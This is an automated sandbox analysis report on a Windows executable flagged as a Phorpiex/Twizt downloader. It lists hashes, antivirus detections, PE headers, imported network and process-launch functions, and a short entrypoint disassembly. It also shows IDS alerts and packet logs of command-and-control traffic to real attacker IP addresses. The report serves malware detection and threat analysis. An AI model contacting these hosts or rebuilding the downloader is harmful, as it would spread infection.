                                                                  SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):5.073117059268331
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:LM94OE0VNK.exe
                                                                  File size:10'240 bytes
                                                                  MD5:8ce09f13942ab5bcb81b175996c8385f
                                                                  SHA1:6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd
                                                                  SHA256:757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d
                                                                  SHA512:11ae4651b3dd55355b2cb7bf2f6b042dea47bb895f898d967d63ee652652c633cc5becf31cb2fd7f8797b238b264195d09d4e08211b797eae29e2a7bb31b277f
                                                                  SSDEEP:96:7L0paShFKPqYTdGLDad04DCcR+58DsrVJQsfuJxGEOaRh2qhRC7tCEMSI:72hBMGtkR+iDswsWJxTOchthyMB
                                                                  TLSH:BF22290B7DCA40A1E3904CF047F2878A8BFE94631B92B2CFB7B3C2595F5135184966E6
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L...t4Hg...........

                                                                  File Icon

                                                                  Icon Hash:90cececece8e8eb0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x401701
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67483474 [Thu Nov 28 09:14:28 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e6eef170b092805b77c0546e3604d99f

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F36744F4F57h
                                                                  jmp 00007F36744F491Bh
                                                                  mov edi, edi
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  mov eax, dword ptr [eax]
                                                                  cmp dword ptr [eax], E06D7363h
                                                                  jne 00007F36744F4C0Ch
                                                                  cmp dword ptr [eax+10h], 03h
                                                                  jne 00007F36744F4C06h
                                                                  mov eax, dword ptr [eax+14h]
                                                                  cmp eax, 19930520h
                                                                  je 00007F36744F4BF7h
                                                                  cmp eax, 19930521h
                                                                  je 00007F36744F4BF0h
                                                                  cmp eax, 19930522h
                                                                  je 00007F36744F4BE9h
                                                                  cmp eax, 01994000h
                                                                  jne 00007F36744F4BE7h
                                                                  call 00007F36744F4FACh
                                                                  xor eax, eax
                                                                  pop ebp
                                                                  retn 0004h
                                                                  push 0040170Bh
                                                                  call dword ptr [00402048h]
                                                                  xor eax, eax
                                                                  ret
                                                                  int3
                                                                  jmp dword ptr [004020B8h]
                                                                  push 00000014h
                                                                  push 00402440h
                                                                  call 00007F36744F4E43h
                                                                  push dword ptr [00403384h]
                                                                  mov esi, dword ptr [0040206Ch]
                                                                  call esi
                                                                  pop ecx
                                                                  mov dword ptr [ebp-1Ch], eax
                                                                  cmp eax, FFFFFFFFh
                                                                  jne 00007F36744F4BEEh
                                                                  push dword ptr [ebp+08h]
                                                                  call dword ptr [00402068h]
                                                                  pop ecx
                                                                  jmp 00007F36744F4C49h
                                                                  push 00000008h
                                                                  call 00007F36744F4F6Dh
                                                                  pop ecx
                                                                  and dword ptr [ebp-04h], 00000000h
                                                                  push dword ptr [00403384h]
                                                                  call esi
                                                                  mov dword ptr [ebp-1Ch], eax
                                                                  push dword ptr [00403380h]
                                                                  call esi
                                                                  pop ecx
                                                                  pop ecx
                                                                  mov dword ptr [ebp-20h], eax
                                                                  lea eax, dword ptr [ebp-20h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-1Ch]
                                                                  push eax
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, dword ptr [00402064h]
                                                                  call esi

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2008 SP1 build 30729
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2005 build 50727
                                                                  • [C++] VS2008 SP1 build 30729
                                                                  • [LNK] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x247c0xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2b0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x19c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x23b00x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x10c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000xc5a0xe00c033fa3be1360d8f21205d8514b59106False0.5775669642857143data5.628875405373284IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x20000xa7c0xc0070da5f280c9a4a4dbcb3a3a467843d58False0.4375data4.431376231305874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x30000x38c0x200202a0f14ba4a024e6a35d5895669b769False0.060546875data0.35275948821577235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x40000x2b00x400554d0cedd69e96ee00c8324ce4da604cFalse0.3623046875data5.194459669718395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x50000x20c0x4009d72d8e8c5d99e604065fd0bedfb410cFalse0.4111328125data3.3645885903769637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_MANIFEST0x40580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535

                                                                  Imports

                                                                  DLLImport
                                                                  SHLWAPI.dllPathFileExistsW
                                                                  MSVCR90.dll__set_app_type, ?terminate@@YAXXZ, _unlock, __dllonexit, _encode_pointer, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, _lock
                                                                  WININET.dllInternetOpenW, InternetOpenUrlW, InternetOpenUrlA, InternetOpenA, InternetCloseHandle, InternetReadFile
                                                                  urlmon.dllURLDownloadToFileW
                                                                  KERNEL32.dllGetCurrentThreadId, QueryPerformanceCounter, InterlockedExchange, GetTickCount, WriteFile, DeleteFileW, CreateProcessW, Sleep, ExpandEnvironmentStringsW, CreateFileW, CloseHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoA, SetUnhandledExceptionFilter, InterlockedCompareExchange
                                                                  USER32.dllwsprintfW
                                                                  SHELL32.dllShellExecuteW

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-28T18:18:28.772817+01002856563ETPRO MALWARE Phorpiex Domain in DNS Lookup1192.168.2.10555311.1.1.153UDP
                                                                  2024-11-28T18:18:30.566440+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049702185.215.113.6680TCP
                                                                  2024-11-28T18:18:33.724115+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049702185.215.113.6680TCP
                                                                  2024-11-28T18:18:33.724115+01002853292ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin1192.168.2.1049702185.215.113.6680TCP
                                                                  2024-11-28T18:18:41.727174+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049703185.215.113.6680TCP
                                                                  2024-11-28T18:18:41.727174+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1049703185.215.113.6680TCP
                                                                  2024-11-28T18:18:43.482513+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.105529390.156.160.640500UDP
                                                                  2024-11-28T18:18:44.488388+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049706185.215.113.6680TCP
                                                                  2024-11-28T18:18:44.488388+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1049706185.215.113.6680TCP
                                                                  2024-11-28T18:18:48.533043+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.105529380.191.218.20940500UDP
                                                                  2024-11-28T18:18:48.794430+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.104971191.202.233.14180TCP
                                                                  2024-11-28T18:18:51.034709+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049712185.215.113.6680TCP
                                                                  2024-11-28T18:18:51.034709+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1049712185.215.113.6680TCP
                                                                  2024-11-28T18:18:53.558980+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049713185.215.113.6680TCP
                                                                  2024-11-28T18:18:53.558980+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.1049713185.215.113.6680TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 28, 2024 18:18:29.095056057 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:29.216053009 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:29.216289043 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:29.216578007 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:29.336524010 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.566354036 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.566440105 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.566548109 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.566591024 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.568135977 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.568157911 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.568171978 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.568186998 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.568223000 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.568223000 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.569247961 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.569271088 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.569281101 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.569303989 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.569331884 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.570137978 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.570183039 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.570241928 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.570281029 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.687505960 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.687551022 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.687659979 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.687704086 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.691699982 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.691818953 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.702912092 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.702923059 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.703008890 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.760257959 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.760318995 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.760325909 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.760361910 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.764497995 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.764558077 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.764610052 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.764648914 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.773648977 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.773720026 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.773727894 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.773873091 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.781354904 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.781409025 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.781430006 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.781469107 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.789829969 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.789916992 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.789932013 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.789973021 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.798209906 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.798305988 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.798311949 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.798361063 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.806602001 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.806679964 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.806817055 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.806863070 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.814917088 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.815025091 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.815063953 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.815135002 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.823307991 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.823419094 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.823477030 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.823523998 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.831007004 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.831074953 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.831178904 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.831221104 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.838737011 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.838789940 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.938165903 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.938220024 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.938275099 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.938317060 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.941997051 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.942073107 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.952393055 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.952405930 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.952482939 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.954704046 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.954766035 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.954777002 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.954817057 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.959346056 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.959410906 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.959422112 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.959454060 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.963835001 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.963912964 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.963922024 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.963963985 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.968460083 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.968518019 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.968529940 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.968570948 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.973146915 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.973201036 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.973237038 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.973278999 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.977859974 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.977909088 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.977940083 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.977977991 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.982398033 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.982440948 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.982490063 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.982528925 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.987091064 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.987162113 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.987190962 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.987234116 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.991736889 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.991801977 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.991894960 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.991935015 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.996454954 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.996512890 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.996561050 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.996601105 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.001029015 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.001082897 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.001173019 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.001219034 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.005687952 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.005733967 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.005785942 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.005824089 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.010337114 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.010397911 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.010448933 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.010490894 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.014952898 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.015002966 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.015054941 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.015091896 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.019623995 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.019699097 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.019736052 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.019785881 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.024234056 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.024293900 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:33.160669088 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:33.280755997 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:33.723968029 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:33.724114895 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:34.067478895 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.148210049 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.271528959 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:40.271619081 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.271831989 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.393220901 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727097034 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727135897 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727174044 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.727205038 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.729139090 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.729176044 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.730559111 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730573893 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730588913 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730639935 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.730684042 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731241941 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731255054 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731268883 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731292963 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731307030 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731611013 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731926918 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731964111 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731972933 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.732004881 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.850075006 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.850142956 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:42.983342886 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.110472918 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:43.110611916 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.111243010 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.231192112 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:43.479971886 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.602015972 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:43.602137089 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.603981972 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.724108934 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:43.724273920 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.844238997 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488215923 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488320112 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488388062 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.488388062 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489069939 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489093065 CET8049706185.215.113.66192.168.2.10
